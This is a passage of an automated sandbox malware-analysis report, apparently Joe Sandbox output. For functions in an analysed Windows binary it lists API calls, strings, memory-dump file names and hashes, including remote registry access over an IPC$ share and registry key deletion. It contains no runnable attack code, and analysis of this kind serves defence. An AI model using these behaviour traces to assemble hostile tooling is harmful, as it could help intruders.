GetWindowRect.USER32(?,?), ref: 00C14B8B

Strings

ThumbnailClass, xrefs: 00C14A6F, 00C14AF1

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 443e44f79971582bf0fdc639bf6a66b58db6027f5dfaf77c7f8753cb7f1d87c0
Instruction ID: 4a41db6259be2d5fb378253914572ea1a5229ca71dc747c471314b71dab02e95
Opcode Fuzzy Hash: 443e44f79971582bf0fdc639bf6a66b58db6027f5dfaf77c7f8753cb7f1d87c0
Instruction Fuzzy Hash: 6791C3710082059FDB08CF14C985FEAB7E8FF46354F04846AFD959A195EB30EE85EBA1

Function 00C48D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BC9BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C48D5A
GetFocus.USER32 ref: 00C48D6A
GetDlgCtrlID.USER32(00000000), ref: 00C48D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00C48E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C48ECF
GetMenuItemCount.USER32(?), ref: 00C48EEC
GetMenuItemID.USER32(?,00000000), ref: 00C48EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C48F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C48F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C48FA1

Strings

0, xrefs: 00C48E9F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 2c26c1b762b0352b87b6424de5720441ff79eaccb822aa23abda6631bd039a55
Instruction ID: f291f435e526f2f6d9a3ec20fa442e952c197bc500fd2d68bea266c25f578513
Opcode Fuzzy Hash: 2c26c1b762b0352b87b6424de5720441ff79eaccb822aa23abda6631bd039a55
Instruction Fuzzy Hash: 8C81C075508301AFEB10CF24C884BAF7BE9FB89714F04095DF9A497291DB30DA09DB62

Function 00C1DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C1DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C1DC46
_wcslen.LIBCMT ref: 00C1DC50
_wcsstr.LIBVCRUNTIME ref: 00C1DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C1DCBC

Strings

%u.%u.%u.%u, xrefs: 00C1DD9A
04090000, xrefs: 00C1DCF2
DefaultLangCodepage, xrefs: 00C1DD1F
StringFileInfo\, xrefs: 00C1DC8F
\VarFileInfo\Translation, xrefs: 00C1DCB4

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 86fbeccf2a7bdd15ef7b071adaf2bca8aa62b4c1b7317580d679b4604818fc0f
Instruction ID: 6780fbce1cfed0dc513c693482d82cf8f988a648c53ebd1e59e686fa3ce31969
Opcode Fuzzy Hash: 86fbeccf2a7bdd15ef7b071adaf2bca8aa62b4c1b7317580d679b4604818fc0f
Instruction Fuzzy Hash: F841E432A406017BDB10A765AC43FFF77ACEF52710F1040EAF901A6292FB749A0197B5

Function 00C3CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C3CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00C3CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C3CD48

Part of subcall function 00C3CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00C3CCAA
Part of subcall function 00C3CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00C3CCBD
Part of subcall function 00C3CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C3CCCF
Part of subcall function 00C3CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00C3CD05
Part of subcall function 00C3CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00C3CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 00C3CCF3

Strings

advapi32.dll, xrefs: 00C3CCB8
RegDeleteKeyExW, xrefs: 00C3CCC9

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 2b3434581ac4319cfbab86fc80a9abdfaacd31d2034265732c08a3f5c75c0a8c
Instruction ID: 1b54d5a933d4a51bb43ebd4b6e14985672d9c3c943a49dad19f783008d363321
Opcode Fuzzy Hash: 2b3434581ac4319cfbab86fc80a9abdfaacd31d2034265732c08a3f5c75c0a8c
Instruction Fuzzy Hash: 87315A75902129BBDB208B65DCC8FFFBB7CEF46750F000165F916E2250DA349A45DBA0

Function 00C23D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C23D40
_wcslen.LIBCMT ref: 00C23D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C23D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C23DBE
RemoveDirectoryW.KERNEL32(?), ref: 00C23DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C23E55
CloseHandle.KERNEL32(00000000), ref: 00C23E60
CloseHandle.KERNEL32(00000000), ref: 00C23E6B

Strings

\??\%s, xrefs: 00C23D5B
\, xrefs: 00C23D77
:, xrefs: 00C23D82

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 8a43e9e5d090cf62f80d8357ae83c851a46a4b836def2b38c0d8c3190cab32b8
Instruction ID: 114b06c1602cbf3a06ed4953f59718ff79427e7db90277286aa5d9f6c2b9fbd1
Opcode Fuzzy Hash: 8a43e9e5d090cf62f80d8357ae83c851a46a4b836def2b38c0d8c3190cab32b8
Instruction Fuzzy Hash: 6E31C176A10259ABDB219FA0DC88FEF37BCEF89700F1040B6F519D2160E77497448B24

Function 00C1E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00C1E6B4

Part of subcall function 00BCE551: timeGetTime.WINMM(?,?,00C1E6D4), ref: 00BCE555

Sleep.KERNEL32(0000000A), ref: 00C1E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00C1E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C1E727
SetActiveWindow.USER32 ref: 00C1E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C1E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 00C1E773
Sleep.KERNEL32(000000FA), ref: 00C1E77E
IsWindow.USER32 ref: 00C1E78A
EndDialog.USER32(00000000), ref: 00C1E79B

Strings

BUTTON, xrefs: 00C1E719

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 89a836b2a4dfff032caf195c27734820117a624e2e59271bece18ed26df36d8b
Instruction ID: 929b84309d763141e6d86703c286d408038c831437228a423c4abea16220ed84
Opcode Fuzzy Hash: 89a836b2a4dfff032caf195c27734820117a624e2e59271bece18ed26df36d8b
Instruction Fuzzy Hash: 9E216F74201644AFFB005F60ECCDBAD3BA9FB57748B144424FD15C22B1EB71AC40AB68

Function 00C1E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C1EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C1EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C1EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C1EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C1EAA7

Strings

open , xrefs: 00C1EA0C
alias PlayMe, xrefs: 00C1EA36
play PlayMe, xrefs: 00C1EAA2
status PlayMe mode, xrefs: 00C1EA58
close PlayMe, xrefs: 00C1EA6E, 00C1EA9B
play PlayMe wait, xrefs: 00C1EA91

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: cb7bcb0294aecc269023ce8aa9876545a3db67dcb06f24cc73bd03a4d7559a2c
Instruction ID: ad832bded8240efc0f3077b1d7b837e13e536c77de0e1f4aa80c527a9d9a1f11
Opcode Fuzzy Hash: cb7bcb0294aecc269023ce8aa9876545a3db67dcb06f24cc73bd03a4d7559a2c
Instruction Fuzzy Hash: 8F115131A502697AD720A7A2DC4AEFF6EBCEFD2F40F444479B915A20D1EAB00A45D5B0

Function 00C15CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00C15CE2
GetWindowRect.USER32(00000000,?), ref: 00C15CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C15D59
GetDlgItem.USER32(?,00000002), ref: 00C15D69
GetWindowRect.USER32(00000000,?), ref: 00C15D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C15DCF
GetDlgItem.USER32(?,000003E9), ref: 00C15DDD
GetWindowRect.USER32(00000000,?), ref: 00C15DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C15E31
GetDlgItem.USER32(?,000003EA), ref: 00C15E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C15E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00C15E67

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 45298a47033f859f922162e234e6f842fc663b5ce2d13eeca29a6aaba5a3c62f
Instruction ID: 4dfccbbd85cb5bf2552c20b8510d26f3d8ce67fbf082a2e7374aae23a62f07b3
Opcode Fuzzy Hash: 45298a47033f859f922162e234e6f842fc663b5ce2d13eeca29a6aaba5a3c62f
Instruction Fuzzy Hash: 7D511CB4A00605AFDB18DF69DD89BEEBBB5BF89300F108129F915E6290D7709E40CB50

Function 00BC8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BC8BE8,?,00000000,?,?,?,?,00BC8BBA,00000000,?), ref: 00BC8FC5

DestroyWindow.USER32(?), ref: 00BC8C81
KillTimer.USER32(00000000,?,?,?,?,00BC8BBA,00000000,?), ref: 00BC8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00C06973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00BC8BBA,00000000,?), ref: 00C069A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00BC8BBA,00000000,?), ref: 00C069B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00BC8BBA,00000000), ref: 00C069D4
DeleteObject.GDI32(00000000), ref: 00C069E6

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 795fe7685e725f724fdb2bd93b36da0ceb85164173f2e4615be8dd65be844d94
Instruction ID: 51a474fcdea959445aa6f2a4379dc4d2e25588899b43bbe68e339876c94b1f01
Opcode Fuzzy Hash: 795fe7685e725f724fdb2bd93b36da0ceb85164173f2e4615be8dd65be844d94
Instruction Fuzzy Hash: 8661AC31502700DFDB259F14D988B2AB7F1FB41322F1845ACE4529B9B0CB35AE91DFA8

Function 00BC9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00BC9944: GetWindowLongW.USER32(?,000000EB), ref: 00BC9952

GetSysColor.USER32(0000000F), ref: 00BC9862

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 55e89296936359740e475b3340eed4db80df5ae86ee40c1a3b80e6098e898230
Instruction ID: fbcfc8a0e5be14383c33541981ba6a9e22e41c61487a8840d02202405e1c1289
Opcode Fuzzy Hash: 55e89296936359740e475b3340eed4db80df5ae86ee40c1a3b80e6098e898230
Instruction Fuzzy Hash: AE417B35505640AFEB205B389C88FBD3BA5FB06371F144699F9B28B1E2D7719D42DB20

Function 00C196E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00BFF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00C19717
LoadStringW.USER32(00000000,?,00BFF7F8,00000001), ref: 00C19720

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00BFF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00C19742
LoadStringW.USER32(00000000,?,00BFF7F8,00000001), ref: 00C19745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00C19866

Strings

^ ERROR, xrefs: 00C197FB
Error: , xrefs: 00C1981D
Line %d:, xrefs: 00C197A0
%s (%d) : ==> %s: %s %s, xrefs: 00C1984A
Line %d (File "%s"):, xrefs: 00C1978F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: f99ab67dff0f769570fc394e5d507415ebaf9eb5eec74870b779dc031b043e14
Instruction ID: 903fe52864735918deda2ac82ca85c8343c8c860b9d12b276e6405210d8d6224
Opcode Fuzzy Hash: f99ab67dff0f769570fc394e5d507415ebaf9eb5eec74870b779dc031b043e14
Instruction Fuzzy Hash: E2414072800209ABDB14EBE0CD96EFE77B8EF15740F5400A5F60572092EBB56F48DB61

Function 00C106DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB6B57: _wcslen.LIBCMT ref: 00BB6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C107A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C107BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C107DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C10804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00C1082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C10837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C1083C

Strings

\IPC$, xrefs: 00C10784
\CLSID, xrefs: 00C10724
SOFTWARE\Classes\, xrefs: 00C1070E

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 83dff4cfeeab4ff28bb5e17579b08924377d71bf2aa9fb1656410961ac38999d
Instruction ID: e6a10b0557ba9970c3767c1dc6f48f468205ff865932bf4bd266dcf0cb656d69
Opcode Fuzzy Hash: 83dff4cfeeab4ff28bb5e17579b08924377d71bf2aa9fb1656410961ac38999d
Instruction Fuzzy Hash: 6F413872C10229ABDF11EBA4DC85DFEB7B8BF04750B144169E911A31A0EBB09E84CB90

Function 00C33C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C33C5C
CoInitialize.OLE32(00000000), ref: 00C33C8A
CoUninitialize.OLE32 ref: 00C33C94
_wcslen.LIBCMT ref: 00C33D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00C33DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00C33ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00C33F0E
CoGetObject.OLE32(?,00000000,00C4FB98,?), ref: 00C33F2D
SetErrorMode.KERNEL32(00000000), ref: 00C33F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C33FC4
VariantClear.OLEAUT32(?), ref: 00C33FD8

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 6a2cdbad1f0e5ac7a90296c46edf7973d23fa1ccdaabf6c53d870a843cf9ec6a
Instruction ID: b9f465cdd9b79714d7ac7e15eb07742636868ba687291e3d2e3bc083f05a90dc
Opcode Fuzzy Hash: 6a2cdbad1f0e5ac7a90296c46edf7973d23fa1ccdaabf6c53d870a843cf9ec6a
Instruction Fuzzy Hash: BEC166716183419FC700DF68C884A2BBBE9FF89744F10495DF98A9B260DB71EE45CB52

Function 00C27A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C27AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C27B8F
SHGetDesktopFolder.SHELL32(?), ref: 00C27BA3
CoCreateInstance.OLE32(00C4FD08,00000000,00000001,00C76E6C,?), ref: 00C27BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C27C74
CoTaskMemFree.OLE32(?,?), ref: 00C27CCC
SHBrowseForFolderW.SHELL32(?), ref: 00C27D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C27D7A
CoTaskMemFree.OLE32(00000000), ref: 00C27D81
CoTaskMemFree.OLE32(00000000), ref: 00C27DD6
CoUninitialize.OLE32 ref: 00C27DDC

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
